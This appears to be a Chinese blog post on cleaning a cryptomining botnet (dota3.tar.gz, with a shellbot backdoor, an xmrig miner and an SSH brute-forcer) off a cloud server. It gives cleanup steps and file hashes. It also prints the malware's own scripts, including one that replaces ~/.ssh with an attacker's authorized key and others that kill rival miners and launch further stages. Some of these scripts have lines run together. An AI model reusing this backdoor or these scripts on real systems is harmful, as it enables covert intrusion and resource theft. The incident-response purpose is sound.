手动查杀病毒

1、利用top命令查看占用cpu高的进程

top

2、利用 ll /proc/进程号

查到病毒存放的路径  cd /tem/.X25-unix/./rsync/b

[root@VM-0-14-centos b]# vim run
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh

杀毒过程

1、vi /root/.ssh/authorized_keys     删除乱起八糟的秘钥

删除缓存文件

rm -rf /tmp/.X25-unix/dota3.tar.gz /tmp/.X25-unix/.rsync/*

删除病毒目录及文件(可能会在其他目录也会有零散文件)

rm -rf /root/.configrc

最后检查一下是否存在多余用户,再更改用户密码
cat /etc/passwd
检查一下是否其他地方有病毒文件

find / -name kswapd0

删除文件

2、根据腾讯云提供的木马路径进行查找 利用ls -a查看文件

找到一个压缩包dota3.tar.gz   解压查看

a目录下存放shellbot后门,b目录下存放挖矿木马,c目录下存放SSH爆破攻击程序。

查看initall 文件

#!/bin/sh
rm -rf /tmp/.FILE
rm -rf /tmp/.FILE*
rm -rf /dev/shm/.FILE*
rm -rf /dev/shm/.FILE
rm -rf /var/tmp/.FILE
rm -rf /var/tmp/.FILE*
rm -rf /tmp/nu.sh
rm -rf /tmp/nu.*
rm -rf /dev/shm/nu.sh
rm -rf /dev/shm/nu.*
rm -rf /tmp/.F*
rm -rf /tmp/.x*
rm -rf /tmp/tdd.shpkill -9 go> .out
pkill -9 run> .out
pkill -9 tsm> .out
kill -9 `ps x|grep run|grep -v grep|awk '{print $1}'`> .out
kill -9 `ps x|grep go|grep -v grep|awk '{print $1}'`> .out
kill -9 `ps x|grep tsm|grep -v grep|awk '{print $1}'`> .outkillall -9 xmrig
killall -9 ld-linux
kill -9 `ps x|grep xmrig|grep -v grep|awk '{print $1}'`
kill -9 `ps x|grep ld-linux|grep -v grep|awk '{print $1}'`
cat init | bashsleep 10
cd ~
pwd > dir.dir
dir=$(cat dir.dir)
if [ -d "$dir/.bashtemprc2" ]; thenexit 0
elsecat init2 | bash
fi
exit 0

执行dota/.rsync/initall,Install做一些清理准备工作后,执行init功能

#!/bin/sh##########################################################################################\
### A script for killing cryptocurrecncy miners in a Linux enviornment
### Provided with zero liability (!)
###
### Some of the malware used as sources for this tool:
### https://pastebin.com/pxc1sXYZ
### https://pastebin.com/jRerGP1u
### SHA256: 2e3e8f980fde5757248e1c72ab8857eb2aea9ef4a37517261a1b013e3dc9e3c4
##########################################################################################\# Killing processes by name, path, arguments and CPU utilization
processes(){killme() {killall -9 chron-34e2fg;ps wx|awk '/34e|r\/v3|moy5|defunct/' | awk '{print $1}' | xargs kill -9 & > /dev/null &}killa() {what=$1;ps auxw|awk "/$what/" |awk '!/awk/' | awk '{print $2}'|xargs kill -9&>/dev/null&}killa 34e2fgkillme# Killing big CPUVAR=$(ps uwx|awk '{print $2":"$3}'| grep -v CPU)for word in $VARdoCPUUSAGE=$(echo $word|awk -F":" '{print $2}'|awk -F"." '{ print $1}')if [ $CPUUSAGE -gt 55 ]; then echo BIG $word; PID=$(echo $word | awk -F":" '{print $1'});LINE=$(ps uwx | grep $PID);COUNT=$(echo $LINE| grep -P "er/v5|34e2|Xtmp|wf32N4|moy5Me|ssh"|wc -l);if [ $COUNT -eq 0 ]; then echo KILLING $line; fi;kill $PID;fi;donekillall \.Historyskillall \.sshdkillall neptunekillall xm64killall xm32killall ld-linuxkillall xmrigkillall \.xmrigkillall suppoieup

病毒手动删除

1、 删除以下文件,杀死对应进程:

/tmp/*-unix/.rsync/a/kswapd0

*/.configrc/a/kswapd0

md5: 84945e9ea1950be3e870b798bd7c7559

/tmp/*-unix/.rsync/c/tsm64

md5: 4adb78770e06f8b257f77f555bf28065

/tmp/*-unix/.rsync/c/tsm32

md5: 10ea65f54f719bffcc0ae2cde450cb7a

2、 检查cron.d中是否存在包含以下内容的定时任务,如有进行删除:

/a/upd

/b/sync

/c/aptitud

云服务dota3.tar.gz病毒查杀相关推荐

  1. W32.Downedup.B顽固病毒——查杀记

    W32.Downedup.B顽固病毒--查杀记:前因后果 Dec 20.2011 这几天的我,埋头忙碌于处理这么一件事--近来被一个名为W32.Downedup.B顽固病毒折腾了一段时间,弄得新上线的 ...

  2. 彻底分析ARP病毒查杀防范全攻略

                           彻底分析ARP病毒查杀防范全攻略      近期在全国范围内大规模爆发arp病毒及其各种变种.如果局域网中发现许多台电脑中毒,电脑中毒后会向同网段内所有计 ...

  3. Android病毒查杀原理

    1.常规本地查杀 特征码: 在手机系统中,每个应用都有它特有的特征信息,他是该应用所特有的,每个应用都是不同的,这就是手机的特征码. 应用的特征码包括:包名和应用签名 Android中,同一个包名的程 ...

  4. Android进阶之路 - 病毒查杀

    那段时间公司app陆续被应用平台下架,后面发现主要被腾讯管家报的木马病毒,针对于此病毒,官方并未进行说明,对应病毒资料也很少,所以我们需要自己逐步去排毒,解决病毒最重要的一步应该是定位病毒,然后根据病 ...

  5. kswapd0病毒查杀

    6月27日发现CPU被挤爆 通过top查看进程使用情况发现属于git用户下出现许多进程,占用满的CPU 处理办法 直接kill掉git用户下的所有进程! 6月28日观察,并未发现异常. 6月29日休息 ...

  6. xmrig病毒查杀方法

    xmrig病毒查杀报告 一.中毒服务器列表: 192.168.. 二.服务器中毒现象 1.服务器CPU占用异常,如下图: 2.存在异常进程: 三.病毒源 发现如下明显的病毒脚本: 四.查杀过程 1.按 ...

  7. 文件夹exe病毒查杀方法(图解)

    文件夹exe病毒查杀方法(图解) http://www.antidu.cn/html/200901/wenjianjiabingdu-exe.html ------------------------ ...

  8. android病毒下载地址,LINE病毒查杀

    LINE病毒查杀是免费通话.免费传讯「LINE」的周边应用程序之一.它能保护智能手机上个人信息的安全,使其免于病毒或恶意程序的侵害.您只要执行几个简单的步骤就能确认手机状态或完成病毒扫描. LINE病 ...

  9. android146 360 病毒查杀

    <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns:android=&quo ...

最新文章

  1. 分享一个PC端六格密码输入框写法
  2. 取消tableView上面多出来20个像素
  3. 二十四、Python数据建模(下),禁止转载
  4. C++中如何定义动态数组
  5. C和指针之实现strlen函数
  6. css设置a连接禁用样式_使用CSS禁用链接
  7. 状态机(FSM)的介绍--以检测序列1001为例
  8. 跨域 webpack + vue-cil 中 proxyTable 处理跨域
  9. 超英文邮件50%!Flink 中文邮件列表必须有姓名
  10. 阶段1 语言基础+高级_1-3-Java语言高级_06-File类与IO流_04 IO字节流_8_字节输入流_InputStream类FileInputStream...
  11. 福师计算机在线作业在每个w,16春季福师《计算机应用基础》在线作业二
  12. java数据采集_基于Java的数据采集(终结篇)
  13. php获取客户端ip地址或者服务器ip地址
  14. win7修复计算机卡了,Win7修复漏洞补丁后系统变卡的原因和解决方法
  15. IDEA环境下yml文件不显示小绿叶(不被识别为配置文件)
  16. 【渝粤教育】电大中专建筑施工技术作业 题库
  17. 半导体封装行业晶圆划片机的切割良率如何把控?
  18. Jaca定时任务-01-进程级别的Timer,ScheduledExecutorService,springtask
  19. HP惠普打印机驱动安装详解
  20. 如何用计算机解开op手机密码,oppo清除锁屏密码【操作技巧】

热门文章

  1. 唯美官网倒计时引导页源码
  2. 天下英雄莫能当——李世民之虎牢关之战
  3. 无处 不在的无线智能——6g 的关键驱动与研究挑战_三星电子发布6G白皮书 网友:先把5G弄明白...
  4. onbeforeunload触发ajax,浅谈window.onbeforeunload() 事件调用ajax
  5. 软件测试工程师的一天工作内容是什么?
  6. python django vue +VSCode 前后端分离
  7. 【csma/ca协议和csma/cd协议的matlab仿真详解】
  8. windows系统之powershell基础
  9. 大数据预测清明节交通
  10. 数据库访问抽象层系列-1(介绍数据库编程接口及数据库访问抽象层概念)